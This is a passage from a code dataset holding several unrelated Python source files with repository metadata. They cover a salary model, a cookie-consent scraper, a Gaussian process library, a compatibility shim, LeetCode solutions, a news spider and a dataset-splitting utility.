job skills and salary.\n'''\n\n### Final Step. Pickel the model for productionization\nimport pickle\npickl = {'model2': rf_Grid}\npickle.dump( pickl, open( 'regressor' + \".p\", \"wb\" ) )\nfile_name = \"regressor.p\"\nwith open(file_name, 'rb') as pickled:\n data = pickle.load(pickled)\n job_cls = data['model2']","repo_name":"jbae42/Glassdoor_Job_Salary_Estimate","sub_path":"Model Building/Regression_SalaryEstimate.py","file_name":"Regression_SalaryEstimate.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"74924832302","text":"from docopt import docopt\nfrom requests import Session\n\nimport os\nimport pickle\nimport logging\nfrom typing import Set, Dict\nfrom datetime import datetime\n\nfrom src.base_scraper import BaseScraper\nfrom src.cookiebot_scraper import CookiebotScraper\nfrom src.onetrust_scraper import OneTrustScraper\nfrom src.termly_scraper import TermlyScraper\n\nlogger = logging.getLogger(\"main\")\noutput_path = f\"./scrape_out_{datetime.now().strftime('%Y%m%d_%H%M%S')}\"\n\n\ndef add_stderr_to_logger(loglevel: str) -> None:\n \"\"\" Enables logging to stderr \"\"\"\n formatter = logging.Formatter('%(asctime)s :: %(name)s :: %(levelname)s :: %(message)s', datefmt=\"%Y-%m-%d-%H:%M:%S\")\n ch = logging.StreamHandler()\n ch.setLevel(loglevel)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n\ndef setupLogger(logdir: str, loglevel: str) -> None:\n \"\"\"\n Set up the logger instance, write to a log file.\n :param logdir: Directory for the log file.\n :param loglevel: Log level at which to record.\n \"\"\"\n loglevel = logging.getLevelName(loglevel)\n logger.setLevel(loglevel)\n formatter = logging.Formatter('%(asctime)s :: %(name)s :: %(levelname)s :: %(message)s', datefmt=\"%Y-%m-%d-%H:%M:%S\")\n\n os.makedirs(logdir, exist_ok=True)\n logfile = os.path.join(logdir, \"scrape_cl.log\")\n\n # log file output\n fh = logging.FileHandler(filename=logfile, mode=\"w\", encoding=\"utf8\")\n fh.setLevel(loglevel)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n\ndef retrieve_urls(cargs: Dict) -> Set[str]:\n \"\"\"\n Retrieve URLs to be crawled from arguments.\n :param cargs: docopt arguments\n :return: set of unique urls, prefixed with HTTP prefix if needed\n \"\"\"\n sites: Set[str] = set()\n\n # retrieve URLs directly from command line\n for u in cargs[\"--url\"]:\n sites.add(u)\n\n # retrieve data from pickle files\n for p in cargs[\"--pkl\"]:\n if os.path.exists(p):\n with open(p, 'rb') as fd:\n contents = pickle.load(fd, encoding=\"utf-8\")\n for c in contents:\n sites.add(c)\n else:\n logger.error(f\"Provided pickle file path is invalid: \\\"{p}\\\"\")\n\n # retrieve urls from plaintext files, one url per line\n for fn in cargs[\"--file\"]:\n if os.path.exists(fn):\n with open(fn, 'r', encoding=\"utf-8\") as fd:\n for line in fd:\n sites.add(line.strip())\n else:\n logger.error(f\"Provided plaintext file path is invalid: \\\"{fn}\\\"\")\n\n # check correctness of URL and remove comment lines\n copy = sites.copy()\n while copy:\n url = copy.pop()\n if not url or len(url.strip()) == 0 or url.startswith(\"#\"):\n sites.remove(url)\n elif not url.lower().startswith(\"http://\") and not url.lower().startswith(\"https://\"):\n sites.remove(url)\n if cargs[\"--assume_http\"]:\n sites.add(\"http://\" + url)\n logger.debug(f\"Appended HTTP prefix to URL: \\\"{url}\\\"\")\n else:\n logger.warning(f\"Removed URL: \\\"{url}\\\" (missing http schema)\")\n\n return sites\n\n\ndef main():\n argv = None\n\n ## Some example sites to test the crawler on. Uncomment one line to test the extraction.\n # argv = [\"cookiebot\", \"--url\", \"https://purplemath.com/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"cookiebot\", \"--url\", \"https://gamefly.com/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"onetrust\", \"--url\", \"https://www.metabomb.net/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"onetrust\", \"--url\", \"https://www.maytag.com/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"onetrust\", \"--url\", \"https://www.aveda.com/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"onetrust\", \"--url\", \"https://www.equipmenttrader.com/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"onetrust\", \"--url\", \"https://www.tiffany.com/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"termly\", \"--url\", \"https://zoella.co.uk/\", \"--loglevel\", \"DEBUG\"]\n # argv = [\"termly\", \"--url\", \"https://www.dailystep.com/\", \"--loglevel\", \"DEBUG\"]\n\n # Initialize docopt, logger and get the arguments\n cargs = docopt(__doc__, argv=argv)\n setupLogger(logdir=output_path, loglevel=cargs[\"--loglevel\"].upper())\n add_stderr_to_logger(cargs[\"--loglevel\"].upper())\n sites = retrieve_urls(cargs)\n\n # abort if no sites specified\n if len(sites) == 0:\n logger.error(\"No URLs to crawl! Aborting...\")\n return 1\n\n scraper: BaseScraper\n if cargs[\"cookiebot\"]:\n logger.info(\"CookieBot provider selected\")\n scraper = CookiebotScraper(output_path, debug_mode=False)\n elif cargs[\"onetrust\"]:\n logger.info(\"OneTrust provider selected\")\n scraper = OneTrustScraper(output_path, debug_mode=False)\n elif cargs[\"termly\"]:\n logger.info(\"Termly provider selected\")\n scraper = TermlyScraper(output_path, debug_mode=False)\n else:\n logger.error(\"Unsupported Consent Management Provider\")\n return 2\n\n # Perform the crawl\n sess = Session()\n scraper.start_webdriver()\n comp_succ = comp_fail = 0\n total = len(sites)\n try:\n while sites:\n u = sites.pop()\n logger.info(f\"Crawling: {u}\")\n success_status = scraper.scrape_website(u, sess)\n if success_status:\n logger.info(f\"Crawl for site {u} completed successfully.\")\n comp_succ += 1\n else:\n logger.warning(f\"Crawl for site {u} failed!\")\n comp_fail += 1\n logger.info(\"%i/%i completed.\" % (comp_succ + comp_fail, total))\n\n except KeyboardInterrupt:\n logger.info(\"Execution has been cancelled by Keyboard Interrupt.\")\n os.makedirs(output_path, exist_ok=True)\n with open(os.path.join(output_path, \"uncrawled_urls.txt\"), 'w') as fd:\n for s in sites:\n fd.write(s + \"\\n\")\n finally:\n scraper.stop_webdriver()\n sess.close()\n\n logger.info(\"Crawl Completed. Success: %i/%i -- Failed: %i/%i\"\n % (comp_succ, total, comp_fail, total))\n\n # Dump crawl statistics and error information\n scraper.dump_crawl_statistics(os.path.join(output_path, \"crawl_statistics.csv\"))\n scraper.dump_full_error_info(os.path.join(output_path, \"error_info.txt\"))\n scraper.dump_failed_urls(os.path.join(output_path, \"failed_urls.txt\"))\n\n # Output collected data into a SQLite database\n sql_db = os.path.join(output_path, cargs[\"--dbname\"])\n scraper.setup_database(sql_db, \"./schema/schema.sql\")\n scraper.store_cookies_in_db()\n scraper.close_database()\n\n # cookie label output\n # label_path = os.path.join(output_path, \"cookie_labels.csv\")\n # src.dump_cookie_names_with_labels(label_path)\n\n logger.info(f\"Crawl data has been written to: {output_path}\")\n return 0\n\n\nif __name__ == \"__main__\":\n exit_code = main()\n exit(exit_code)\n","repo_name":"dibollinger/CookieBlock-Crawler-Prototype","sub_path":"run_scraper.py","file_name":"run_scraper.py","file_ext":"py","file_size_in_byte":6866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"9547974617","text":"import inspect\n\nimport jax\nimport jax.numpy as jnp\nimport jax.random as random\nimport numpy as np\nimport numpyro as npy\nimport numpyro.distributions as dist\nfrom jax import vmap\nfrom jax.scipy.linalg import cholesky\nfrom numgp.cov import Constant, Covariance, Kron, WhiteNoise\nfrom numgp.math import cartesian, kron_dot, kron_solve_lower, kron_solve_upper\nfrom numgp.mean import Zero\nfrom numgp.util import infer_shape, solve_lower, solve_upper, stabilize\n\n\nclass Base:\n R\"\"\"\n Base class.\n \"\"\"\n\n def __init__(self, mean_func=Zero(), cov_func=Constant(0.0)):\n self.mean_func = mean_func\n self.cov_func = cov_func\n\n def __add__(self, other):\n same_attrs = set(self.__dict__.keys()) == set(other.__dict__.keys())\n if not isinstance(self, type(other)) or not same_attrs:\n raise TypeError(\"Cannot add different GP types\")\n mean_total = self.mean_func + other.mean_func\n cov_total = self.cov_func + other.cov_func\n return self.__class__(mean_total, cov_total)\n\n def prior(self, name, X, *args, **kwargs):\n raise NotImplementedError\n\n def marginal_likelihood(self, name, X, *args, **kwargs):\n raise NotImplementedError\n\n def conditional(self, name, Xnew, *args, **kwargs):\n raise NotImplementedError\n\n def predict(self, Xnew, point=None, given=None, diag=False):\n raise NotImplementedError\n\n\nclass Marginal(Base):\n R\"\"\"\n Marginal Gaussian process.\n The `gp.Marginal` class is an implementation of the sum of a GP\n prior and additive noise. It has `marginal_likelihood`, `conditional`\n and `predict` methods. This GP implementation can be used to\n implement regression on data that is normally distributed. For more\n information on the `prior` and `conditional` methods, see their docstrings.\n Parameters\n ----------\n cov_func: None, 2D array, or instance of Covariance\n The covariance function. Defaults to zero.\n mean_func: None, instance of Mean\n The mean function. Defaults to zero.\n Examples\n --------\n .. code:: python\n # A one dimensional column vector of inputs.\n X = np.linspace(0, 1, 10)[:, None]\n with pm.Model() as model:\n # Specify the covariance function.\n cov_func = pm.gp.cov.ExpQuad(1, ls=0.1)\n # Specify the GP. The default mean function is `Zero`.\n gp = pm.gp.Marginal(cov_func=cov_func)\n # Place a GP prior over the function f.\n sigma = pm.HalfCauchy(\"sigma\", beta=3)\n y_ = gp.marginal_likelihood(\"y\", X=X, y=y, noise=sigma)\n ...\n # After fitting or sampling, specify the distribution\n # at new points with .conditional\n Xnew = np.linspace(-1, 2, 50)[:, None]\n with model:\n fcond = gp.conditional(\"fcond\", Xnew=Xnew)\n \"\"\"\n\n def __init__(self, name, mean_func=Zero(), cov_func=Constant(0.0)):\n super().__init__(mean_func, cov_func)\n self.name = name\n\n def _build_marginal_likelihood(self, X):\n mu = npy.deterministic(f\"{self.name}_mean\", self.mean_func(X))\n Kxx = npy.deterministic(f\"{self.name}_Kxx\", self.cov_func(X))\n Knx = npy.deterministic(f\"{self.name}_Knx\", self.noise(X))\n cov = Kxx + Knx\n return mu, cov\n\n def marginal_likelihood(self, X, y, noise, is_observed=True, **kwargs):\n R\"\"\"\n Returns the marginal likelihood distribution, given the input\n locations `X` and the data `y`.\n This is integral over the product of the GP prior and a normal likelihood.\n .. math::\n y \\mid X,\\theta \\sim \\int p(y \\mid f,\\, X,\\, \\theta) \\, p(f \\mid X,\\, \\theta) \\, df\n Parameters\n ----------\n name: string\n Name of the random variable\n X: array-like\n Function input values. If one-dimensional, must be a column\n vector with shape `(n, 1)`.\n y: array-like\n Data that is the sum of the function with the GP prior and Gaussian\n noise. Must have shape `(n, )`.\n noise: scalar, Variable, or Covariance\n Standard deviation of the Gaussian noise. Can also be a Covariance for\n non-white noise.\n is_observed: bool\n Whether to set `y` as an `observed` variable in the `model`.\n Default is `True`.\n **kwargs\n Extra keyword arguments that are passed to `MvNormal` distribution\n constructor.\n \"\"\"\n\n if not isinstance(noise, Covariance):\n self.noise = WhiteNoise(noise)\n else:\n self.noise = noise\n\n mu, cov = self._build_marginal_likelihood(X)\n _ = npy.deterministic(f\"{self.name}_y\", y)\n\n if is_observed:\n return npy.sample(\n f\"{self.name}\",\n dist.MultivariateNormal(loc=mu, covariance_matrix=cov),\n obs=y,\n )\n else:\n shape = infer_shape(X, kwargs.pop(\"shape\", None))\n return npy.sample(\n f\"{self.name}\", dist.MultivariateNormal(loc=mu, covariance_matrix=cov)\n )\n\n def _get_given_vals(self, given):\n if given is None:\n given = {}\n\n if \"gp\" in given:\n cov_total = given[\"gp\"].cov_func\n mean_total = given[\"gp\"].mean_func\n else:\n cov_total = self.cov_func\n mean_total = self.mean_func\n if all(val in given for val in [\"X\", \"y\", \"noise\"]):\n X, y, noise = given[\"X\"], given[\"y\"], given[\"noise\"]\n if not isinstance(noise, Covariance):\n noise = pm.gp.cov.WhiteNoise(noise)\n else:\n X, y, noise = self.X, self.y, self.noise\n return X, y, noise, cov_total, mean_total\n\n def _build_conditional(self, X=None, Xnew=None):\n # sets deterministic sites to sample from the condtional\n npy.deterministic(f\"{self.name}_Kss\", self.cov_func(Xnew))\n npy.deterministic(f\"{self.name}_Kns\", self.cov_func(Xnew))\n npy.deterministic(f\"{self.name}_Ksx\", self.cov_func(Xnew, X))\n npy.deterministic(f\"{self.name}_cond\", self.mean_func(Xnew))\n\n def conditional(self, X=None, Xnew=None):\n self._build_conditional(X, Xnew)\n return None\n\n\nclass LatentKron(Base):\n R\"\"\"\n Latent Gaussian process whose covariance is a tensor product kernel.\n The `gp.LatentKron` class is a direct implementation of a GP with a\n Kronecker structured covariance, without reference to any noise or\n specific likelihood. The GP is constructed with the `prior` method,\n and the conditional GP over new input locations is constructed with\n the `conditional` method. `conditional` and method. For more\n information on these methods, see their docstrings. This GP\n implementation can be used to model a Gaussian process whose inputs\n cover evenly spaced grids on more than one dimension. `LatentKron`\n is relies on the `KroneckerNormal` distribution, see its docstring\n for more information.\n Parameters\n ----------\n cov_funcs: list of Covariance objects\n The covariance functions that compose the tensor (Kronecker) product.\n Defaults to [zero].\n mean_func: None, instance of Mean\n The mean function. Defaults to zero.\n Examples\n --------\n .. code:: python\n # One dimensional column vectors of inputs\n X1 = np.linspace(0, 1, 10)[:, None]\n X2 = np.linspace(0, 2, 5)[:, None]\n Xs = [X1, X2]\n with pm.Model() as model:\n # Specify the covariance functions for each Xi\n cov_func1 = pm.gp.cov.ExpQuad(1, ls=0.1) # Must accept X1 without error\n cov_func2 = pm.gp.cov.ExpQuad(1, ls=0.3) # Must accept X2 without error\n # Specify the GP. The default mean function is `Zero`.\n gp = pm.gp.LatentKron(cov_funcs=[cov_func1, cov_func2])\n # ...\n # After fitting or sampling, specify the distribution\n # at new points with .conditional\n # Xnew need not be on a full grid\n Xnew1 = np.linspace(-1, 2, 10)[:, None]\n Xnew2 = np.linspace(0, 3, 10)[:, None]\n Xnew = np.concatenate((Xnew1, Xnew2), axis=1) # Not full grid, works\n Xnew = pm.math.cartesian(Xnew1, Xnew2) # Full grid, also works\n with model:\n fcond = gp.conditional(\"fcond\", Xnew=Xnew)\n \"\"\"\n\n def __init__(self, name, mean_func=Zero(), cov_funcs=(Constant(0.0))):\n try:\n self.cov_funcs = list(cov_funcs)\n except TypeError:\n self.cov_funcs = [cov_funcs]\n cov_func = Kron(self.cov_funcs)\n super().__init__(mean_func, cov_func)\n self.name = name\n\n def __add__(self, other):\n raise TypeError(\"Additive, Kronecker-structured processes not implemented\")\n\n def _build_prior(self, Xs, **kwargs):\n self.N = np.prod([len(X) for X in Xs])\n mu = self.mean_func(cartesian(Xs))\n chols = []\n for i, (cov, X) in enumerate(zip(self.cov_funcs, Xs)):\n Kxx = npy.deterministic(f\"{self.name}_Kxx_{i}\", cov(X))\n chol = cholesky(stabilize(Kxx), lower=True)\n chols.append(chol)\n\n # remove reparameterization option\n v = npy.sample(\n f\"{self.name}_rotated\",\n dist.Normal(loc=jnp.zeros(self.N), scale=jnp.ones(self.N), **kwargs),\n )\n f = npy.deterministic(self.name, mu + (kron_dot(chols, v)).reshape(-1))\n return f\n\n def prior(self, Xs, **kwargs):\n \"\"\"\n Returns the prior distribution evaluated over the input\n locations `Xs`.\n Parameters\n ----------\n name: string\n Name of the random variable\n Xs: list of array-like\n Function input values for each covariance function. Each entry\n must be passable to its respective covariance without error. The\n total covariance function is measured on the full grid\n `cartesian(*Xs)`.\n **kwargs\n Extra keyword arguments that are passed to the `KroneckerNormal`\n distribution constructor.\n \"\"\"\n if len(Xs) != len(self.cov_funcs):\n raise ValueError(\"Must provide a covariance function for each X\")\n f = self._build_prior(Xs, **kwargs)\n return f\n\n def _build_conditional(self, Xs=None, Xconds=None, **kwargs):\n # sets deterministic sites to sample from the condtional\n Xs = cartesian(Xs)\n Xconds = cartesian(Xconds)\n npy.deterministic(f\"{self.name}_mean\", self.mean_func(Xs))\n npy.deterministic(f\"{self.name}_cond\", self.mean_func(Xconds))\n npy.deterministic(f\"{self.name}_Kss\", self.cov_func(Xconds))\n npy.deterministic(f\"{self.name}_Ksx\", self.cov_func(Xconds, Xs))\n\n def conditional(self, Xs, Xnew, *args, **kwargs):\n self._build_conditional(Xs, Xnew)\n return None\n","repo_name":"sagar87/numgp","sub_path":"numgp/gp.py","file_name":"gp.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"40857503238","text":"\"\"\"Python 2/3 Compatibility layer.\"\"\"\n\nimport sys\n\ntry:\n import ssl\nexcept ImportError:\n ssl = None\n\ntry:\n import simplejson as json # noqa\nexcept ImportError:\n import json # noqa\n\ntry:\n import urlparse # noqa\nexcept ImportError:\n import urllib.parse as urlparse # noqa\n\ntry:\n from urllib import quote # noqa\nexcept ImportError:\n from urllib.parse import quote # noqa\n\nPYTHON3 = sys.version_info >= (3, 0, 0)\n\nif PYTHON3:\n RANGE = range\nelse:\n RANGE = xrange\n\nSSL_CERT_MAP = {}\nSSL_VERSIONS = {}\nSSL_OPTIONS = [\n 'keyfile',\n 'certfile',\n 'cert_reqs',\n 'ssl_version',\n 'ca_certs'\n]\n\n\ndef get_default_ssl_version():\n \"\"\"Get the highest support TLS version, if none is available, return None.\n\n :rtype: bool|None\n \"\"\"\n if hasattr(ssl, 'PROTOCOL_TLSv1_2'):\n return ssl.PROTOCOL_TLSv1_2\n elif hasattr(ssl, 'PROTOCOL_TLSv1_1'):\n return ssl.PROTOCOL_TLSv1_1\n elif hasattr(ssl, 'PROTOCOL_TLSv1'):\n return ssl.PROTOCOL_TLSv1\n return None\n\n\nDEFAULT_SSL_VERSION = get_default_ssl_version()\nSSL_SUPPORTED = DEFAULT_SSL_VERSION is not None\nif SSL_SUPPORTED:\n if hasattr(ssl, 'PROTOCOL_TLSv1_2'):\n SSL_VERSIONS['protocol_tlsv1_2'] = ssl.PROTOCOL_TLSv1_2\n if hasattr(ssl, 'PROTOCOL_TLSv1_1'):\n SSL_VERSIONS['protocol_tlsv1_1'] = ssl.PROTOCOL_TLSv1_1\n SSL_VERSIONS['protocol_tlsv1'] = ssl.PROTOCOL_TLSv1\n\n SSL_CERT_MAP = {\n 'cert_none': ssl.CERT_NONE,\n 'cert_optional': ssl.CERT_OPTIONAL,\n 'cert_required': ssl.CERT_REQUIRED\n }\n\n\ndef is_string(obj):\n \"\"\"Is this a string.\n\n :param object obj:\n :rtype: bool\n \"\"\"\n if PYTHON3:\n str_type = (bytes, str)\n else:\n str_type = (bytes, str, unicode)\n return isinstance(obj, str_type)\n\n\ndef is_integer(obj):\n \"\"\"Is this an integer.\n\n :param object obj:\n :return:\n \"\"\"\n if PYTHON3:\n return isinstance(obj, int)\n return isinstance(obj, (int, long))\n\n\ndef is_unicode(obj):\n \"\"\"Is this a unicode string.\n\n This always returns False if running Python 3.x.\n\n :param object obj:\n :rtype: bool\n \"\"\"\n if PYTHON3:\n return False\n return isinstance(obj, unicode)\n\n\ndef try_utf8_decode(value):\n \"\"\"Try to decode an object.\n\n :param value:\n :return:\n \"\"\"\n if not value or not is_string(value):\n return value\n elif PYTHON3 and not isinstance(value, bytes):\n return value\n elif not PYTHON3 and not isinstance(value, unicode):\n return value\n\n try:\n return value.decode('utf-8')\n except UnicodeDecodeError:\n pass\n\n return value\n\n\ndef patch_uri(uri):\n \"\"\"If a custom uri schema is used with python 2.6 (e.g. amqps),\n it will ignore some of the parsing logic.\n\n As a work-around for this we change the amqp/amqps schema\n internally to use http/https.\n\n :param str uri: AMQP Connection string\n :rtype: str\n \"\"\"\n index = uri.find(':')\n if uri[:index] == 'amqps':\n uri = uri.replace('amqps', 'https', 1)\n elif uri[:index] == 'amqp':\n uri = uri.replace('amqp', 'http', 1)\n return uri\n","repo_name":"fake-name/ReadableWebProxy","sub_path":"amqpstorm/compatibility.py","file_name":"compatibility.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"91"}
+{"seq_id":"1347929091","text":"# Input: s = \"codeleet\", indices = [4,5,6,7,0,2,1,3]\n# Output: \"leetcode\"\n# Explanation: As shown, \"codeleet\" becomes \"leetcode\" after shuffling.\n# Example 2:\n\n# Input: s = \"abc\", indices = [0,1,2]\n# Output: \"abc\"\n# Explanation: After shuffling, each character remains in its position.\n\n\ns = \"codeleet\"\n\nindices = [4, 5, 6, 7, 0, 2, 1, 3]\n\n\ndef restoreString(s: str, indices) -> str:\n n = len(s)\n l = [0]*n\n for i in range(n):\n l[indices[i]] = s[i]\n s = ''.join(l)\n return s\n\n\nprint(restoreString(s, indices))\n","repo_name":"kanstat/LeetCode-Solutions","sub_path":"leet1528.py","file_name":"leet1528.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7685025710","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def reverseKGroup(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n if head == None:\n return None\n\n dumb = ListNode(0)\n l = dumb\n cur = head\n r = cur.next\n l.next = cur\n\n while True:\n # 先判断包括cur以及之后的k个节点是否存在, 不存在则返回\n flag_node = cur\n for _ in range(k):\n if flag_node == None:\n return dumb.next\n flag_node = flag_node.next\n\n # 进行k个一组的翻转过程, 一共k-1步\n new_l = cur\n for _ in range(k - 1):\n tmp = r.next\n r.next = cur\n cur = r\n r = tmp\n\n # 进行连接和指针位置变换\n l.next = cur\n l = new_l\n cur = r\n l.next = cur\n if cur:\n r = cur.next\n\n\nif __name__ == '__main__':\n head = ListNode(1)\n head.next = ListNode(2)\n head.next.next = ListNode(3)\n head.next.next.next = ListNode(4)\n\n result = Solution().reverseKGroup(head, 2)\n\n while result != None:\n print(result.val)\n result = result.next\n\n\n","repo_name":"blackwings001/LeetCode","sub_path":"1-50/_25_reverse_k_group.py","file_name":"_25_reverse_k_group.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"24998376809","text":"from typing import List, Dict\nimport re\n\n\ndef get_input_from_file_as_list_of_lines(filename: str) -> List[str]:\n l = []\n with open(filename) as f:\n for line in f:\n l.append(line)\n return l\n\n\ndef get_input_from_file_as_single_string(filename: str) -> str:\n s = \"\"\n with open(filename) as f:\n for line in f:\n s += line\n return s\n\n\ndef word_count_dictionary(text: str) -> Dict[str, int]:\n words = text.split()\n d = {}\n for w in words:\n if w not in d:\n d[w] = 1\n else:\n d[w] += 1\n # https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value\n d = dict(sorted(d.items(), key=lambda item: item[1], reverse=True))\n return d\n\n\ndef main():\n f1 = \"lorem_ipsum.txt\"\n f2 = \"regexr_example.txt\"\n s = get_input_from_file_as_single_string(f1)\n t = get_input_from_file_as_single_string(f2)\n\n # Print the word counts sorted by frequency\n print(word_count_dictionary(s))\n print()\n print(word_count_dictionary(t))\n print()\n\n # Example of built-in .replace()\n print(s.replace('the', 'THEEEEE'))\n\n # Example of built-in re.sub()\n pattern = \"([A-Z])\\w+\"\n replace = \"CAPITAL WORD\"\n t = re.sub(pattern, replace, t)\n print(t)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bliutwo/notable-health-backend","sub_path":"py_template.py","file_name":"py_template.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"9478273943","text":"# -*- coding: utf8 -*-\nfrom scrapy.http import JsonRequest, Request\nfrom scrapy.selector import Selector\nfrom bs4 import BeautifulSoup\n\nfrom ssg_new_crawler.spiders.tintucSSG import SSGSpider\nfrom ssg_new_crawler.utils import download_img\n\n\nclass Techz(SSGSpider):\n name = \"Techz\"\n url = 'https://www.techz.vn/category-more-dien-thoai-{page}'\n page = 1\n limit = 30\n\n def create_request(self, item, data, *a, **kw):\n return Request(self.url.format(page=self.page), callback=self.parse, errback=self.fail, meta={'item': item})\n\n def parse(self, response):\n item = response.meta.get('item')\n\n # extract catlink and image\n cat_link = [f'https://www.techz.vn{x}' for x in response.css(\".media .media-body > a::attr(href)\").extract()]\n imgs = response.css('.media img::attr(src)').extract()\n\n for url, img in list(zip(cat_link, imgs)):\n self.crawler.stats.inc_value(f'{self.name}/total')\n detail_item = item.copy()\n detail_item.update(\n new_source_url=url,\n new_image=img # download_img(img)\n )\n # check item exist in database\n if not self.model.exist(detail_item):\n yield Request(url, callback=self.parse_detail, errback=self.fail, meta={'item': detail_item})\n\n # nextpage\n self.page += 1\n yield Request(self.url.format(page=self.page), callback=self.parse, errback=self.fail, meta={'item': item})\n\n def parse_detail(self, response):\n item = response.meta.get('item')\n\n # extract title, description, content\n title = response.css('h1::text').extract_first()\n description = response.css('h2::text').extract_first()\n\n soup = BeautifulSoup(response.text, 'html.parser')\n content = soup.select_one('.content-detail-right')\n\n # remove h2 and tag contain .inner-article\n remove_tags = content.select('h2') + content.select('.inner-article')\n for tag in remove_tags:\n tag.decompose()\n # replace img\n for tag in content.select('img'):\n # soup.new_tag() create new image tag\n new_tag = soup.new_tag('img', src=tag['src']) # soup.new_tag('img', src=download_img(tag['data-original']))\n # replaces tag with new_tag\n tag.replace_with(new_tag)\n\n # update item\n item.update(\n new_title=title,\n new_description=description,\n new_content=str(content)\n )\n # yield item\n import pdb; pdb.set_trace()\n self.logger.info(f\"url: {response.url} done, \"\\\n f\"category: {self.crawler.stats.get_value(f'{self.name}/total')}, \"\\\n f\"saved: {self.crawler.stats.get_value(f'{self.name}/saved')}\")\n","repo_name":"anhlt59/crawler","sub_path":"ssg_new_crawler/spiders/tintucSSG/Techz.py","file_name":"Techz.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7724272978","text":"\"\"\"\nThis module provides classes for datasets handling with the following \nfeatures:\n - Automatically returns a datasets in the format (data, labels).\n - Supports data splitting in train, test and validation sets.\n - Supports data shuffling.\n - Automatically data enconding and categorical transformation.\n - Data balancing.\nUse this module on keras projects.\n\"\"\"\n\nfrom inspect import currentframe, getframeinfo\nimport numpy as np\nimport collections\nimport sklearn\nimport keras\nimport random\nfrom common.util import logm\n\n\ndef balance_data(x, y):\n \"\"\"\n Balance data to be representative.\n\n Note: When balancing the data, the number os data and labels tends to\n decrease because the extra instances of some classes will be removed. \n \n Args:\n x (list like): Data or paths.\n y (list like): Labels/classes. \n\n Returns:\n tuple (np.ndarray, np.ndarray): x, y balanced\n \"\"\"\n dataset = list(zip(x, y))\n unique, counts = np.unique(y, return_counts=True)\n max_n_instances = min(counts)\n paths_per_label = dict()\n for label in unique:\n paths_per_label[label] = list(filter(lambda d: d[1] == label, dataset))\n x = []\n y = []\n for label in paths_per_label:\n for inst, lbl in paths_per_label[label][:max_n_instances]:\n x.append(inst)\n y.append(lbl)\n\n return np.asarray(x), np.asarray(y)\n\n\nclass Dataset:\n \"\"\"\n Dataset class.\n \n Features:\n - Automatically returns a datasets in the format (data, labels).\n - Supports data splitting in train, test and validation sets.\n - Supports data shuffling.\n - Automatically data enconding and categorical transformation.\n \"\"\"\n def __init__(self,\n data,\n labels,\n name=None,\n encode_labels=True,\n to_categorical=True,\n shuffle=True,\n num_classes=None,\n val_split=0.0,\n test_split=0.0):\n \"\"\"\n Creates a new dataset with the provided data and labels.\n \n Args:\n data (list like): a list like with data or paths\n labels (list like): a list like with the corresponding labels \n name (str, optional): The name of this dataset. Defaults to None.\n encode_labels (bool, optional): Choose to encode labels\n automatically. Defaults to True.\n to_categorical (bool, optional): Choose to convert the labels to\n categorical automatically. Defaults to True.\n shuffle (bool, optional): Choose to shuffle the dataset.\n Defaults to True.\n num_classes (int, optional): Number of classes of this dataset.\n Affects the categorical and encoded labels. If None, it will\n be considered the number of different classes in labels.\n Defaults to None.\n val_split (float, optional): Validation split of this dataset.\n Must be in the range of [0.0, 1.0]. Defaults to 0.0.\n test_split (float, optional): Test split of this dataset.\n Must be in the range of [0.0, 1.0]. Defaults to 0.0.\n \"\"\"\n logm(f'Creating dataset: total of {len(data)} samples',\n cur_frame=currentframe(), mtype='I')\n if len(data) != len(labels):\n logm(f'Size of data ({len(data)}) and labels ({len(labels)}) '\n 'are different', cur_frame=currentframe(), mtype='W')\n if not shuffle and (val_split > 0.0 or test_split > 0.0):\n logm(f'Split is set but no shuffling will be performed',\n cur_frame=currentframe(), mtype='W')\n if name:\n self._name = name\n self._data = data\n self._labels = labels\n self._shuffle = shuffle\n self._val_split = val_split\n self._test_split = test_split\n self._le = None\n if num_classes is None:\n self._num_classes = np.unique(labels).shape[0]\n else:\n self._num_classes = num_classes\n\n self._data_labels = list(zip(self._data, self._labels))\n if self._shuffle:\n random.shuffle(self._data_labels)\n\n all_data = self._data\n all_labels = self._labels\n train_data = list()\n train_labels = list()\n val_data = list()\n val_labels = list()\n test_data = list()\n test_labels = list()\n\n if self._test_split > 0.0 or self._val_split > 0.0:\n data_per_label = collections.defaultdict(lambda: [])\n for p, l in zip(self._data, self._labels):\n data_per_label[l].append(p)\n\n splits = [0, 1 - (val_split + test_split), 1 - test_split]\n\n for label in data_per_label:\n l_train_data = (data_per_label[label][splits[0]:int(splits[1] *\n len(data_per_label[label]))])\n train_data += l_train_data\n train_labels += [label for _ in range(len(l_train_data))]\n if self._val_split > 0.0:\n l_val_data = (data_per_label[label][int(splits[1]*len(\n data_per_label[label])):int(splits[2]*len(\n 